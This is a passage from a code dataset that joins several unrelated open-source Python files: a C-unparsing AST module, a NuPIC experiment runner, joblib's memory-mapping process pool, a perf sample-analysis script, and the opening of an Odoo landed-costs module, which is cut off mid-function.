abstract syntax tree node''' return CompStmt([s.replicate() for s in self.stmts], self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = '{' for i, t in enumerate(self.stmts): if (i > 0): s += ' ' s += str(t) s += '}' return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = indent + '{ \n' for stmt in self.stmts: s += stmt.unparseToC(indent + extra_indent, extra_indent) s += indent + '} \n' return s #----------------------------------------------- # If-Then-Else #----------------------------------------------- class IfStmt(Stmt): def __init__(self, test, true_stmt, false_stmt = None, line_no = ''): '''Create an if statement''' Stmt.__init__(self, line_no) self.test = test self.true_stmt = true_stmt self.false_stmt = false_stmt # may be null def replicate(self): '''Replicate this abstract syntax tree node''' f_s = self.false_stmt if f_s: f_s = f_s.replicate() return IfStmt(self.test.replicate(), self.true_stmt.replicate(), f_s, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = 'if (' + str(self.test) + ') ' + str(self.true_stmt) if self.false_stmt: s += ' else ' + str(self.false_stmt) return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = indent + 'if (' + self.test.unparseToC(indent, extra_indent) + ') \n' s += self.true_stmt.unparseToC(indent + extra_indent, extra_indent) if self.false_stmt: s += indent + 'else \n' s += self.false_stmt.unparseToC(indent + extra_indent, extra_indent) return s #----------------------------------------------- # For Loop #----------------------------------------------- class ForStmt(Stmt): def __init__(self, init, test, iter, stmt, line_no = ''): '''Create a for-loop statement''' Stmt.__init__(self, line_no) self.init = init # may be null self.test = test # may be null self.iter = iter # may be null self.stmt = stmt def replicate(self): '''Replicate this abstract syntax tree node''' r_in = self.init r_t = self.test r_it = self.iter if r_in: r_in = r_in.replicate() if r_t: r_t = r_t.replicate() if r_it: r_it = r_it.replicate() return ForStmt(r_in, r_t, r_it, self.stmt.replicate(), self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = 'for (' if self.init: s += str(self.init) s += '; ' if self.test: s += str(self.test) s += '; ' if self.iter: s += str(self.iter) s += ') ' + str(self.stmt) return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = '\n' s += indent + 'for (' if self.init: s += self.init.unparseToC(indent, extra_indent) s += '; ' if self.test: s += self.test.unparseToC(indent, extra_indent) s += '; ' if self.iter: s += self.iter.unparseToC(indent, extra_indent) s += ') ' + self.stmt.unparseToC(indent + extra_indent, extra_indent) return s #----------------------------------------------- # Transformation #----------------------------------------------- class TransformStmt(Stmt): def __init__(self, name, kw_args, stmt, line_no = ''): '''Create a transformation statement''' Stmt.__init__(self, line_no) self.name = name self.kw_args = kw_args self.stmt = stmt def replicate(self): '''Replicate this abstract syntax tree node''' return TransformStmt(self.name, [k.replicate() for k in self.kw_args], self.stmt.replicate(), self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = 'transform ' + str(self.name) + ' (' for i, k in enumerate(self.kw_args): if i > 0: s += ', ' s += str(k) s += ') ' + str(self.stmt) return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' print 'internal error: a transformation statement is never generated as output' sys.exit(1) #----------------------------------------------- # New AST #----------------------------------------------- class NewAST(AST): def __init__(self, line_no = ''): '''Create a newly-added statement''' AST.__init__(self, line_no) #----------------------------------------------- # Variable Declaration #----------------------------------------------- class VarDecl(NewAST): def __init__(self, type_name, var_names, line_no = ''): '''Create a variable declaration''' NewAST.__init__(self, line_no) self.type_name = type_name self.var_names = var_names def replicate(self): '''Replicate this abstract syntax tree node''' return VarDecl(self.type_name, self.var_names[:], self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = '' s += self.type_name + ' ' s += ', '.join(map(str, self.var_names)) s += '; ' return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = '' s += indent + self.type_name + ' ' s += ', '.join(map(lambda x: x.unparseToC(indent, extra_indent), self.var_names)) s += '; \n' return s
gpl-3.0
virneo/nupic
scripts/run_opf_experiment.py
37
1210
#!/usr/bin/env python # ---------------------------------------------------------------------- # Numenta Platform for Intelligent Computing (NuPIC) # Copyright (C) 2013, Numenta, Inc. Unless you have an agreement # with Numenta, Inc., for a separate license for this software code, the # following terms and conditions apply: # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero Public License version 3 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Affero Public License for more details. # # You should have received a copy of the GNU Affero Public License # along with this program. If not, see http://www.gnu.org/licenses. # # http://numenta.org/licenses/ # ---------------------------------------------------------------------- """This script is a command-line client of Online Prediction Framework (OPF). It executes a single experiment. """ from nupic.frameworks.opf.experiment_runner import main if __name__ == "__main__": main()
agpl-3.0
B-UMMI/INNUca
src/SPAdes-3.11.1-Linux/share/spades/joblib3/pool.py
237
23894
"""Custom implementation of multiprocessing.Pool with custom pickler This module provides efficient ways of working with data stored in shared memory with numpy.memmap arrays without inducing any memory copy between the parent and child processes. This module should not be imported if multiprocessing is not available as it implements subclasses of multiprocessing Pool that uses a custom alternative to SimpleQueue. """ # Author: Olivier Grisel <olivier.grisel@ensta.org> # Copyright: 2012, Olivier Grisel # License: BSD 3 clause from mmap import mmap import errno import os import stat import sys import threading import atexit import tempfile import shutil try: # Python 2 compat from cPickle import loads from cPickle import dumps except ImportError: from pickle import loads from pickle import dumps import copyreg # Customizable pure Python pickler in Python 2 # customizable C-optimized pickler under Python 3.3+ from pickle import Pickler from pickle import HIGHEST_PROTOCOL from io import BytesIO from ._multiprocessing_helpers import mp, assert_spawning # We need the class definition to derive from it not the multiprocessing.Pool # factory function from multiprocessing.pool import Pool try: import numpy as np from numpy.lib.stride_tricks import as_strided except ImportError: np = None from .numpy_pickle import load from .numpy_pickle import dump from .hashing import hash # Some system have a ramdisk mounted by default, we can use it instead of /tmp # as the default folder to dump big arrays to share with subprocesses SYSTEM_SHARED_MEM_FS = '/dev/shm' # Folder and file permissions to chmod temporary files generated by the # memmaping pool. Only the owner of the Python process can access the # temporary files and folder. FOLDER_PERMISSIONS = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR FILE_PERMISSIONS = stat.S_IRUSR | stat.S_IWUSR ############################################################################### # Support for efficient transient pickling of numpy data structures def _get_backing_memmap(a): """Recursively look up the original np.memmap instance base if any""" b = getattr(a, 'base', None) if b is None: # TODO: check scipy sparse datastructure if scipy is installed # a nor its descendants do not have a memmap base return None elif isinstance(b, mmap): # a is already a real memmap instance. return a else: # Recursive exploration of the base ancestry return _get_backing_memmap(b) def has_shareable_memory(a): """Return True if a is backed by some mmap buffer directly or not""" return _get_backing_memmap(a) is not None def _strided_from_memmap(filename, dtype, mode, offset, order, shape, strides, total_buffer_len): """Reconstruct an array view on a memmory mapped file""" if mode == 'w+': # Do not zero the original data when unpickling mode = 'r+' if strides is None: # Simple, contiguous memmap return np.memmap(filename, dtype=dtype, shape=shape, mode=mode, offset=offset, order=order) else: # For non-contiguous data, memmap the total enclosing buffer and then # extract the non-contiguous view with the stride-tricks API base = np.memmap(filename, dtype=dtype, shape=total_buffer_len, mode=mode, offset=offset, order=order) return as_strided(base, shape=shape, strides=strides) def _reduce_memmap_backed(a, m): """Pickling reduction for memmap backed arrays a is expected to be an instance of np.ndarray (or np.memmap) m is expected to be an instance of np.memmap on the top of the ``base`` attribute ancestry of a. ``m.base`` should be the real python mmap object. """ # offset that comes from the striding differences between a and m a_start, a_end = np.byte_bounds(a) m_start = np.byte_bounds(m)[0] offset = a_start - m_start # offset from the backing memmap offset += m.offset if m.flags['F_CONTIGUOUS']: order = 'F' else: # The backing memmap buffer is necessarily contiguous hence C if not # Fortran order = 'C' if a.flags['F_CONTIGUOUS'] or a.flags['C_CONTIGUOUS']: # If the array is a contiguous view, no need to pass the strides strides = None total_buffer_len = None else: # Compute the total number of items to map from which the strided # view will be extracted. strides = a.strides total_buffer_len = (a_end - a_start) // a.itemsize return (_strided_from_memmap, (m.filename, a.dtype, m.mode, offset, order, a.shape, strides, total_buffer_len)) def reduce_memmap(a): """Pickle the descriptors of a memmap instance to reopen on same file""" m = _get_backing_memmap(a) if m is not None: # m is a real mmap backed memmap instance, reduce a preserving striding # information return _reduce_memmap_backed(a, m) else: # This memmap instance is actually backed by a regular in-memory # buffer: this can happen when using binary operators on numpy.memmap # instances return (loads, (dumps(np.asarray(a), protocol=HIGHEST_PROTOCOL),)) class ArrayMemmapReducer(object): """Reducer callable to dump large arrays to memmap files. Parameters ---------- max_nbytes: int Threshold to trigger memmaping of large arrays to files created a folder. temp_folder: str Path of a folder where files for backing memmaped arrays are created. mmap_mode: 'r', 'r+' or 'c' Mode for the created memmap datastructure. See the documentation of numpy.memmap for more details. Note: 'w+' is coerced to 'r+' automatically to avoid zeroing the data on unpickling. verbose: int, optional, 0 by default If verbose > 0, memmap creations are logged. If verbose > 1, both memmap creations, reuse and array pickling are logged. context_id: int, optional, None by default Set to a value identifying a call context to spare costly hashing of the content of the input arrays when it is safe to assume that each array will not be mutated by the parent process for the duration of the dispatch process. This is the case when using the high level Parallel API. It might not be the case when using the MemmapingPool API directly. prewarm: bool, optional, False by default. Force a read on newly memmaped array to make sure that OS pre-cache it memory. This can be useful to avoid concurrent disk access when the same data array is passed to different worker processes. """ def __init__(self, max_nbytes, temp_folder, mmap_mode, verbose=0, context_id=None, prewarm=True): self._max_nbytes = max_nbytes self._temp_folder = temp_folder self._mmap_mode = mmap_mode self.verbose = int(verbose) self._context_id = context_id self._prewarm = prewarm def __call__(self, a): m = _get_backing_memmap(a) if m is not None: # a is already backed by a memmap file, let's reuse it directly return _reduce_memmap_backed(a, m) if (not a.dtype.hasobject and self._max_nbytes is not None and a.nbytes > self._max_nbytes): # check that the folder exists (lazily create the pool temp folder # if required) try: os.makedirs(self._temp_folder) os.chmod(self._temp_folder, FOLDER_PERMISSIONS) except OSError as e: if e.errno != errno.EEXIST: raise e # Find a unique, concurrent safe filename for writing the # content of this array only once. if self._context_id is not None: marker = self._context_id else: marker = hash(a) basename = "%d-%d-%d-%s.pkl" % ( os.getpid(), id(threading.current_thread()), id(a), marker) filename = os.path.join(self._temp_folder, basename) # In case the same array with the same content is passed several # times to the pool subprocess children, serialize it only once # XXX: implement an explicit reference counting scheme to make it # possible to delete temporary files as soon as the workers are # done processing this data. if not os.path.exists(filename): if self.verbose > 0: print("Memmaping (shape=%r, dtype=%s) to new file %s" % ( a.shape, a.dtype, filename)) for dumped_filename in dump(a, filename): os.chmod(dumped_filename, FILE_PERMISSIONS) if self._prewarm: # Warm up the data to avoid concurrent disk access in # multiple children processes load(filename, mmap_mode=self._mmap_mode).max() elif self.verbose > 1: print("Memmaping (shape=%s, dtype=%s) to old file %s" % ( a.shape, a.dtype, filename)) # Let's use the memmap reducer return reduce_memmap(load(filename, mmap_mode=self._mmap_mode)) else: # do not convert a into memmap, let pickler do its usual copy with # the default system pickler if self.verbose > 1: print("Pickling array (shape=%r, dtype=%s)." % ( a.shape, a.dtype)) return (loads, (dumps(a, protocol=HIGHEST_PROTOCOL),)) ############################################################################### # Enable custom pickling in Pool queues class CustomizablePickler(Pickler): """Pickler that accepts custom reducers. HIGHEST_PROTOCOL is selected by default as this pickler is used to pickle ephemeral datastructures for interprocess communication hence no backward compatibility is required. `reducers` is expected expected to be a dictionary with key/values being `(type, callable)` pairs where `callable` is a function that give an instance of `type` will return a tuple `(constructor, tuple_of_objects)` to rebuild an instance out of the pickled `tuple_of_objects` as would return a `__reduce__` method. See the standard library documentation on pickling for more details. """ # We override the pure Python pickler as its the only way to be able to # customize the dispatch table without side effects in Python 2.6 # to 3.2. For Python 3.3+ leverage the new dispatch_table # feature from http://bugs.python.org/issue14166 that makes it possible # to use the C implementation of the Pickler which is faster. def __init__(self, writer, reducers=None, protocol=HIGHEST_PROTOCOL): Pickler.__init__(self, writer, protocol=protocol) if reducers is None: reducers = {} if hasattr(Pickler, 'dispatch'): # Make the dispatch registry an instance level attribute instead of # a reference to the class dictionary under Python 2 self.dispatch = Pickler.dispatch.copy() else: # Under Python 3 initialize the dispatch table with a copy of the # default registry self.dispatch_table = copyreg.dispatch_table.copy() for type, reduce_func in reducers.items(): self.register(type, reduce_func) def register(self, type, reduce_func): if hasattr(Pickler, 'dispatch'): # Python 2 pickler dispatching is not explicitly customizable. # Let us use a closure to workaround this limitation. def dispatcher(self, obj): reduced = reduce_func(obj) self.save_reduce(obj=obj, *reduced) self.dispatch[type] = dispatcher else: self.dispatch_table[type] = reduce_func class CustomizablePicklingQueue(object): """Locked Pipe implementation that uses a customizable pickler. This class is an alternative to the multiprocessing implementation of SimpleQueue in order to make it possible to pass custom pickling reducers, for instance to avoid memory copy when passing memmory mapped datastructures. `reducers` is expected expected to be a dictionary with key/values being `(type, callable)` pairs where `callable` is a function that give an instance of `type` will return a tuple `(constructor, tuple_of_objects)` to rebuild an instance out of the pickled `tuple_of_objects` as would return a `__reduce__` method. See the standard library documentation on pickling for more details. """ def __init__(self, context, reducers=None): self._reducers = reducers self._reader, self._writer = context.Pipe(duplex=False) self._rlock = context.Lock() if sys.platform == 'win32': self._wlock = None else: self._wlock = context.Lock() self._make_methods() def __getstate__(self): assert_spawning(self) return (self._reader, self._writer, self._rlock, self._wlock, self._reducers) def __setstate__(self, state): (self._reader, self._writer, self._rlock, self._wlock, self._reducers) = state self._make_methods() def empty(self): return not self._reader.poll() def _make_methods(self): self._recv = recv = self._reader.recv racquire, rrelease = self._rlock.acquire, self._rlock.release def get(): racquire() try: return recv() finally: rrelease() self.get = get if self._reducers: def send(obj): buffer = BytesIO() CustomizablePickler(buffer, self._reducers).dump(obj) self._writer.send_bytes(buffer.getvalue()) self._send = send else: self._send = send = self._writer.send if self._wlock is None: # writes to a message oriented win32 pipe are atomic self.put = send else: wlock_acquire, wlock_release = ( self._wlock.acquire, self._wlock.release) def put(obj): wlock_acquire() try: return send(obj) finally: wlock_release() self.put = put class PicklingPool(Pool): """Pool implementation with customizable pickling reducers. This is useful to control how data is shipped between processes and makes it possible to use shared memory without useless copies induces by the default pickling methods of the original objects passed as arguments to dispatch. `forward_reducers` and `backward_reducers` are expected to be dictionaries with key/values being `(type, callable)` pairs where `callable` is a function that give an instance of `type` will return a tuple `(constructor, tuple_of_objects)` to rebuild an instance out of the pickled `tuple_of_objects` as would return a `__reduce__` method. See the standard library documentation on pickling for more details. """ def __init__(self, processes=None, forward_reducers=None, backward_reducers=None, **kwargs): if forward_reducers is None: forward_reducers = dict() if backward_reducers is None: backward_reducers = dict() self._forward_reducers = forward_reducers self._backward_reducers = backward_reducers poolargs = dict(processes=processes) poolargs.update(kwargs) super(PicklingPool, self).__init__(**poolargs) def _setup_queues(self): context = getattr(self, '_ctx', mp) self._inqueue = CustomizablePicklingQueue(context, self._forward_reducers) self._outqueue = CustomizablePicklingQueue(context, self._backward_reducers) self._quick_put = self._inqueue._send self._quick_get = self._outqueue._recv def delete_folder(folder_path): """Utility function to cleanup a temporary folder if still existing""" if os.path.exists(folder_path): shutil.rmtree(folder_path) class MemmapingPool(PicklingPool): """Process pool that shares large arrays to avoid memory copy. This drop-in replacement for `multiprocessing.pool.Pool` makes it possible to work efficiently with shared memory in a numpy context. Existing instances of numpy.memmap are preserved: the child suprocesses will have access to the same shared memory in the original mode except for the 'w+' mode that is automatically transformed as 'r+' to avoid zeroing the original data upon instantiation. Furthermore large arrays from the parent process are automatically dumped to a temporary folder on the filesystem such as child processes to access their content via memmaping (file system backed shared memory). Note: it is important to call the terminate method to collect the temporary folder used by the pool. Parameters ---------- processes: int, optional Number of worker processes running concurrently in the pool. initializer: callable, optional Callable executed on worker process creation. initargs: tuple, optional Arguments passed to the initializer callable. temp_folder: str, optional Folder to be used by the pool for memmaping large arrays for sharing memory with worker processes. If None, this will try in order: - a folder pointed by the JOBLIB_TEMP_FOLDER environment variable, - /dev/shm if the folder exists and is writable: this is a RAMdisk filesystem available by default on modern Linux distributions, - the default system temporary folder that can be overridden with TMP, TMPDIR or TEMP environment variables, typically /tmp under Unix operating systems. max_nbytes int or None, optional, 1e6 by default Threshold on the size of arrays passed to the workers that triggers automated memmory mapping in temp_folder. Use None to disable memmaping of large arrays. forward_reducers: dictionary, optional Reducers used to pickle objects passed from master to worker processes: see below. backward_reducers: dictionary, optional Reducers used to pickle return values from workers back to the master process. verbose: int, optional Make it possible to monitor how the communication of numpy arrays with the subprocess is handled (pickling or memmaping) context_id: int, optional, None by default Set to a value identifying a call context to spare costly hashing of the content of the input arrays when it is safe to assume that each array will not be mutated by the parent process for the duration of the dispatch process. This is the case when using the high level Parallel API. prewarm: bool or str, optional, "auto" by default. If True, force a read on newly memmaped array to make sure that OS pre- cache it in memory. This can be useful to avoid concurrent disk access when the same data array is passed to different worker processes. If "auto" (by default), prewarm is set to True, unless the Linux shared memory partition /dev/shm is available and used as temp_folder. `forward_reducers` and `backward_reducers` are expected to be dictionaries with key/values being `(type, callable)` pairs where `callable` is a function that give an instance of `type` will return a tuple `(constructor, tuple_of_objects)` to rebuild an instance out of the pickled `tuple_of_objects` as would return a `__reduce__` method. See the standard library documentation on pickling for more details. """ def __init__(self, processes=None, temp_folder=None, max_nbytes=1e6, mmap_mode='r', forward_reducers=None, backward_reducers=None, verbose=0, context_id=None, prewarm=False, **kwargs): if forward_reducers is None: forward_reducers = dict() if backward_reducers is None: backward_reducers = dict() # Prepare a sub-folder name for the serialization of this particular # pool instance (do not create in advance to spare FS write access if # no array is to be dumped): use_shared_mem = False pool_folder_name = "joblib_memmaping_pool_%d_%d" % ( os.getpid(), id(self)) if temp_folder is None: temp_folder = os.environ.get('JOBLIB_TEMP_FOLDER', None) if temp_folder is None: if os.path.exists(SYSTEM_SHARED_MEM_FS): try: temp_folder = SYSTEM_SHARED_MEM_FS pool_folder = os.path.join(temp_folder, pool_folder_name) if not os.path.exists(pool_folder): os.makedirs(pool_folder) use_shared_mem = True except IOError: # Missing rights in the the /dev/shm partition, # fallback to regular temp folder. temp_folder = None if temp_folder is None: # Fallback to the default tmp folder, typically /tmp temp_folder = tempfile.gettempdir() temp_folder = os.path.abspath(os.path.expanduser(temp_folder)) pool_folder = os.path.join(temp_folder, pool_folder_name) self._temp_folder = pool_folder # Register the garbage collector at program exit in case caller forgets # to call terminate explicitly: note we do not pass any reference to # self to ensure that this callback won't prevent garbage collection of # the pool instance and related file handler resources such as POSIX # semaphores and pipes atexit.register(lambda: delete_folder(pool_folder)) if np is not None: # Register smart numpy.ndarray reducers that detects memmap backed # arrays and that is alse able to dump to memmap large in-memory # arrays over the max_nbytes threshold if prewarm == "auto": prewarm = not use_shared_mem forward_reduce_ndarray = ArrayMemmapReducer( max_nbytes, pool_folder, mmap_mode, verbose, context_id=context_id, prewarm=prewarm) forward_reducers[np.ndarray] = forward_reduce_ndarray forward_reducers[np.memmap] = reduce_memmap # Communication from child process to the parent process always # pickles in-memory numpy.ndarray without dumping them as memmap # to avoid confusing the caller and make it tricky to collect the # temporary folder backward_reduce_ndarray = ArrayMemmapReducer( None, pool_folder, mmap_mode, verbose) backward_reducers[np.ndarray] = backward_reduce_ndarray backward_reducers[np.memmap] = reduce_memmap poolargs = dict( processes=processes, forward_reducers=forward_reducers, backward_reducers=backward_reducers) poolargs.update(kwargs) super(MemmapingPool, self).__init__(**poolargs) def terminate(self): super(MemmapingPool, self).terminate() delete_folder(self._temp_folder)
gpl-3.0
cwhuang/linux
tools/perf/scripts/python/event_analyzing_sample.py
4719
7393
# event_analyzing_sample.py: general event handler in python # # Current perf report is already very powerful with the annotation integrated, # and this script is not trying to be as powerful as perf report, but # providing end user/developer a flexible way to analyze the events other # than trace points. # # The 2 database related functions in this script just show how to gather # the basic information, and users can modify and write their own functions # according to their specific requirement. # # The first function "show_general_events" just does a basic grouping for all # generic events with the help of sqlite, and the 2nd one "show_pebs_ll" is # for a x86 HW PMU event: PEBS with load latency data. # import os import sys import math import struct import sqlite3 sys.path.append(os.environ['PERF_EXEC_PATH'] + \ '/scripts/python/Perf-Trace-Util/lib/Perf/Trace') from perf_trace_context import * from EventClass import * # # If the perf.data has a big number of samples, then the insert operation # will be very time consuming (about 10+ minutes for 10000 samples) if the # .db database is on disk. Move the .db file to RAM based FS to speedup # the handling, which will cut the time down to several seconds. # con = sqlite3.connect("/dev/shm/perf.db") con.isolation_level = None def trace_begin(): print "In trace_begin:\n" # # Will create several tables at the start, pebs_ll is for PEBS data with # load latency info, while gen_events is for general event. # con.execute(""" create table if not exists gen_events ( name text, symbol text, comm text, dso text );""") con.execute(""" create table if not exists pebs_ll ( name text, symbol text, comm text, dso text, flags integer, ip integer, status integer, dse integer, dla integer, lat integer );""") # # Create and insert event object to a database so that user could # do more analysis with simple database commands. # def process_event(param_dict): event_attr = param_dict["attr"] sample = param_dict["sample"] raw_buf = param_dict["raw_buf"] comm = param_dict["comm"] name = param_dict["ev_name"] # Symbol and dso info are not always resolved if (param_dict.has_key("dso")): dso = param_dict["dso"] else: dso = "Unknown_dso" if (param_dict.has_key("symbol")): symbol = param_dict["symbol"] else: symbol = "Unknown_symbol" # Create the event object and insert it to the right table in database event = create_event(name, comm, dso, symbol, raw_buf) insert_db(event) def insert_db(event): if event.ev_type == EVTYPE_GENERIC: con.execute("insert into gen_events values(?, ?, ?, ?)", (event.name, event.symbol, event.comm, event.dso)) elif event.ev_type == EVTYPE_PEBS_LL: event.ip &= 0x7fffffffffffffff event.dla &= 0x7fffffffffffffff con.execute("insert into pebs_ll values (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (event.name, event.symbol, event.comm, event.dso, event.flags, event.ip, event.status, event.dse, event.dla, event.lat)) def trace_end(): print "In trace_end:\n" # We show the basic info for the 2 type of event classes show_general_events() show_pebs_ll() con.close() # # As the event number may be very big, so we can't use linear way # to show the histogram in real number, but use a log2 algorithm. # def num2sym(num): # Each number will have at least one '#' snum = '#' * (int)(math.log(num, 2) + 1) return snum def show_general_events(): # Check the total record number in the table count = con.execute("select count(*) from gen_events") for t in count: print "There is %d records in gen_events table" % t[0] if t[0] == 0: return print "Statistics about the general events grouped by thread/symbol/dso: \n" # Group by thread commq = con.execute("select comm, count(comm) from gen_events group by comm order by -count(comm)") print "\n%16s %8s %16s\n%s" % ("comm", "number", "histogram", "="*42) for row in commq: print "%16s %8d %s" % (row[0], row[1], num2sym(row[1])) # Group by symbol print "\n%32s %8s %16s\n%s" % ("symbol", "number", "histogram", "="*58) symbolq = con.execute("select symbol, count(symbol) from gen_events group by symbol order by -count(symbol)") for row in symbolq: print "%32s %8d %s" % (row[0], row[1], num2sym(row[1])) # Group by dso print "\n%40s %8s %16s\n%s" % ("dso", "number", "histogram", "="*74) dsoq = con.execute("select dso, count(dso) from gen_events group by dso order by -count(dso)") for row in dsoq: print "%40s %8d %s" % (row[0], row[1], num2sym(row[1])) # # This function just shows the basic info, and we could do more with the # data in the tables, like checking the function parameters when some # big latency events happen. # def show_pebs_ll(): count = con.execute("select count(*) from pebs_ll") for t in count: print "There is %d records in pebs_ll table" % t[0] if t[0] == 0: return print "Statistics about the PEBS Load Latency events grouped by thread/symbol/dse/latency: \n" # Group by thread commq = con.execute("select comm, count(comm) from pebs_ll group by comm order by -count(comm)") print "\n%16s %8s %16s\n%s" % ("comm", "number", "histogram", "="*42) for row in commq: print "%16s %8d %s" % (row[0], row[1], num2sym(row[1])) # Group by symbol print "\n%32s %8s %16s\n%s" % ("symbol", "number", "histogram", "="*58) symbolq = con.execute("select symbol, count(symbol) from pebs_ll group by symbol order by -count(symbol)") for row in symbolq: print "%32s %8d %s" % (row[0], row[1], num2sym(row[1])) # Group by dse dseq = con.execute("select dse, count(dse) from pebs_ll group by dse order by -count(dse)") print "\n%32s %8s %16s\n%s" % ("dse", "number", "histogram", "="*58) for row in dseq: print "%32s %8d %s" % (row[0], row[1], num2sym(row[1])) # Group by latency latq = con.execute("select lat, count(lat) from pebs_ll group by lat order by lat") print "\n%32s %8s %16s\n%s" % ("latency", "number", "histogram", "="*58) for row in latq: print "%32s %8d %s" % (row[0], row[1], num2sym(row[1])) def trace_unhandled(event_name, context, event_fields_dict): print ' '.join(['%s=%s'%(k,str(v))for k,v in sorted(event_fields_dict.items())])
gpl-2.0
jiangzhixiao/odoo
addons/stock_landed_costs/stock_landed_costs.py
42
22915
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import fields, osv import openerp.addons.decimal_precision as dp from openerp.exceptions import Warning from openerp.tools import float_compare, float_round from openerp.tools.translate import _ import product from openerp import SUPERUSER_ID class stock_landed_cost(osv.osv): _name = 'stock.landed.cost' _description = 'Stock Landed Cost' _inherit = 'mail.thread' _track = { 'state': { 'stock_landed_costs.mt_stock_landed_cost_open': lambda self, cr, uid, obj, ctx=None: obj['state'] == 'done', }, } def _total_amount(self, cr, uid, ids, name, args, context=None): result = {} for cost in self.browse(cr, uid, ids, context=context): total = 0.0 for line in cost.cost_lines: total += line.price_unit result[cost.id] = total return result def _get_cost_line(self, cr, uid, ids, context=None): cost_to_recompute = [] for line in self.pool.get('stock.landed.cost.lines').browse(cr, uid, ids, context=context): cost_to_recompute.append(line.cost_id.id) return cost_to_recompute def get_valuation_lines(self, cr, uid, ids, picking_ids=None, context=None): picking_obj = self.pool.get('stock.picking') lines = [] if not picking_ids: return lines for picking in picking_obj.browse(cr, uid, picking_ids): for move in picking.move_lines: #it doesn't make sense to make a landed cost for a product that isn't set as being valuated in real time at real cost if move.product_id.valuation != 'real_time' or move.product_id.cost_method != 'real': continue total_cost = 0.0 weight = move.product_id and move.product_id.weight * move.product_qty volume = move.product_id and move.product_id.volume * move.product_qty for quant in move.quant_ids: total_cost += quant.cost * quant.qty vals = dict(product_id=move.product_id.id, move_id=move.id, quantity=move.product_qty, former_cost=total_cost, weight=weight, volume=volume) lines.append(vals) if not lines: raise osv.except_osv(_('Error!'), _('The selected picking does not contain any move that would be impacted by landed costs. Landed costs are only possible for products configured in real time valuation with real price costing method. Please make sure it is the case, or you selected the correct picking')) return lines _columns = { 'name': fields.char('Name', track_visibility='always', readonly=True, copy=False), 'date': fields.date('Date', required=True, states={'done': [('readonly', True)]}, track_visibility='onchange', copy=False), 'picking_ids': fields.many2many('stock.picking', string='Pickings', states={'done': [('readonly', True)]}, copy=False), 'cost_lines': fields.one2many('stock.landed.cost.lines', 'cost_id', 'Cost Lines', states={'done': [('readonly', True)]}, copy=True), 'valuation_adjustment_lines': fields.one2many('stock.valuation.adjustment.lines', 'cost_id', 'Valuation Adjustments', states={'done': [('readonly', True)]}), 'description': fields.text('Item Description', states={'done': [('readonly', True)]}), 'amount_total': fields.function(_total_amount, type='float', string='Total', digits_compute=dp.get_precision('Account'), store={ 'stock.landed.cost': (lambda self, cr, uid, ids, c={}: ids, ['cost_lines'], 20), 'stock.landed.cost.lines': (_get_cost_line, ['price_unit', 'quantity', 'cost_id'], 20), }, track_visibility='always' ), 'state': fields.selection([('draft', 'Draft'), ('done', 'Posted'), ('cancel', 'Cancelled')], 'State', readonly=True, track_visibility='onchange', copy=False), 'account_move_id': fields.many2one('account.move', 'Journal Entry', readonly=True, copy=False), 'account_journal_id': fields.many2one('account.journal', 'Account Journal', required=True, states={'done': [('readonly', True)]}), } _defaults = { 'name': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'stock.landed.cost'), 'state': 'draft', 'date': fields.date.context_today, } def _create_accounting_entries(self, cr, uid, line, move_id, qty_out, context=None): product_obj = self.pool.get('product.template') cost_product = line.cost_line_id and line.cost_line_id.product_id if not cost_product: return False accounts = product_obj.get_product_accounts(cr, uid, line.product_id.product_tmpl_id.id, context=context) debit_account_id = accounts['property_stock_valuation_account_id'] already_out_account_id = accounts['stock_account_output'] credit_account_id = line.cost_line_id.account_id.id or cost_product.property_account_expense.id or cost_product.categ_id.property_account_expense_categ.id if not credit_account_id: raise osv.except_osv(_('Error!'), _('Please configure Stock Expense Account for product: %s.') % (cost_product.name)) return self._create_account_move_line(cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=context) def _create_account_move_line(self, cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=None): """ Generate the account.move.line values to track the landed cost. Afterwards, for the goods that are already out of stock, we should create the out moves """ aml_obj = self.pool.get('account.move.line') base_line = { 'name': line.name, 'move_id': move_id, 'product_id': line.product_id.id, 'quantity': line.quantity, } debit_line = dict(base_line, account_id=debit_account_id) credit_line = dict(base_line, account_id=credit_account_id) diff = line.additional_landed_cost if diff > 0: debit_line['debit'] = diff credit_line['credit'] = diff else: # negative cost, reverse the entry debit_line['credit'] = -diff credit_line['debit'] = -diff aml_obj.create(cr, uid, debit_line, context=context) aml_obj.create(cr, uid, credit_line, context=context) #Create account move lines for quants already out of stock if qty_out > 0: debit_line = dict(base_line, name=(line.name + ": " + str(qty_out) + _(' already out')), quantity=qty_out, account_id=already_out_account_id) credit_line = dict(base_line, name=(line.name + ": " + str(qty_out) + _(' already out')), quantity=qty_out, account_id=debit_account_id) diff = diff * qty_out / line.quantity if diff > 0: 